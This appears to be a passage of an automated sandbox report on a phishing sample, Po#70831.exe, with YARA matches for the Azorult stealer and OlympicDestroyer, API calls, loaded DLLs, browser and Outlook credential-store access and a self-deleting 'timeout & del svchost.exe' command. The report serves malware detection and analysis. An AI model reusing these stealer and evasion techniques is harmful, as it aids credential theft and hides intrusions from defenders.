                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.svchost.exe.60c5e12.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                Source: 2.2.svchost.exe.605a6c1.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                Source: 2.2.svchost.exe.60386d4.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@8/53@1/1
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_005037B5 GetLastError,FormatMessageW,0_2_005037B5
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F10BF AdjustTokenPrivileges,CloseHandle,0_2_004F10BF
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_004F16C3
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_005051CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_005051CD
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0051A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0051A67C
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_0050648E
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004942A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_004942A2
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-7A741079-EF2CFB53-A8A69178
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5308:120:WilError_03
                Source: C:\Users\user\Desktop\Po#70831.exeFile created: C:\Users\user\AppData\Local\Temp\aut2BB3.tmpJump to behavior
                Source: Po#70831.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                Source: svchost.exe, 00000002.00000003.2434642976.000000000326F000.00000004.00000020.00020000.00000000.sdmp, 45408433256266381758956.tmp.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Po#70831.exeVirustotal: Detection: 33%
                Source: Po#70831.exeReversingLabs: Detection: 71%
                Source: unknownProcess created: C:\Users\user\Desktop\Po#70831.exe "C:\Users\user\Desktop\Po#70831.exe"
                Source: C:\Users\user\Desktop\Po#70831.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Po#70831.exe"
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
                Source: C:\Users\user\Desktop\Po#70831.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Po#70831.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "svchost.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3Jump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Po#70831.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: crtdll.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mozglue.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp140.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                Source: Po#70831.exeStatic file information: File size 1295872 > 1048576
                Source: Po#70831.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: Po#70831.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: Po#70831.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: Po#70831.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Po#70831.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: Po#70831.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: Po#70831.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.2.dr
                Source: Binary string: ucrtbase.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.2.dr
                Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr
                Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.2.dr
                Source: Binary string: wntdll.pdb source: Po#70831.exe, 00000000.00000003.2368245174.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, Po#70831.exe, 00000000.00000003.2368365177.0000000003C50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.2.dr
                Source: Binary string: vcruntime140.i386.pdbGCTL source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.2.dr
                Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr
                Source: Binary string: msvcp140.i386.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.2.dr
                Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-profile-l1-1-0.dll.2.dr
                Source: Binary string: ucrtbase.pdbUGP source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.2.dr
                Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-time-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.2.dr
                Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-handle-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.2.dr
                Source: Binary string: wntdll.pdbUGP source: Po#70831.exe, 00000000.00000003.2368245174.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, Po#70831.exe, 00000000.00000003.2368365177.0000000003C50000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-datetime-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-conio-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-localization-l1-2-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-math-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.2.dr
                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.2.dr
                Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.2.dr
                Source: Binary string: vcruntime140.i386.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-utility-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.2.dr
                Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-timezone-l1-1-0.dll.2.dr
                Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, nssdbm3.dll.2.dr
                Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.2.dr
                Source: Binary string: msvcp140.i386.pdbGCTL source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, msvcp140.dll.2.dr
                Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: svchost.exe, 00000002.00000002.2483931178.0000000005BC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l2-1-0.dll.2.dr
